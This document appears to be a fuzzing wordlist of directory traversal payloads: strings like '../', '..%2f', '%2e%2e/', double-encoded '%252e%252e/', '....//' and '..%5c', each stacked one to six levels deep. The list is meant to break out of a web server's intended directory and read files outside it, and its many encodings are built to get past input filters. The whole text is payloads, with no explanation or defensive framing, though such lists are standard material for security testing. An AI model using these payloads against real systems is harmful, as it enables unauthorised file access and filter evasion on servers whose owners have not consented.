..%5c..%5c
..%5c..%5c..%5c
..%5c..%5c..%5c..%5c
..%5c..%5c..%5c..%5c..%5c
..%5c..%5c..%5c..%5c..%5c..%5c
..%252f
..%252f..%252f
..%252f..%252f..%252f
..%252f..%252f..%252f..%252f
./../
./.././../
./.././.././.././../
./.././.././.././.././../
..///
..///..///
..///..///..///
..///..///..///..///
..///..///..///..///..///
..//
..//..//
..//..//..//
..//..//..//..//
..//..//..//..//..//
../
../../
../../../
../../../../
../../../../../
....//
....//....//
....//....//....//
....//....//....//....//
....//....//....//....//....//
....%2F%2F
....%2F%2F....%2F%2F
....%2F%2F....%2F%2F....%2F%2F
....%2F%2F....%2F%2F....%2F%2F....%2F%2F
....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F
....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F
..%2f
..%2f..%2f
..%2f..%2f..%2f
..%2f..%2f..%2f..%2f
..%2f..%2f..%2f..%2f..%2f
..%%32%66
..%%32%66..%%32%66
..%%32%66..%%32%66..%%32%66
..%%32%66..%%32%66..%%32%66..%%32%66
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66
%2e%2e/
%2e%2e/%2e%2e/
%2e%2e/%2e%2e/%2e%2e/
%2e%2e/%2e%2e/%2e%2e/%2e%2e/
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/
%252e%252e/
%252e%252e/%252e%252e/
%252e%252e/%252e%252e/%252e%252e/
%252e%252e/%252e%252e/%252e%252e/%252e%252e/
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/
%%32%65%%32%65/
%%32%65%%32%65/%%32%65%%32%65/
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/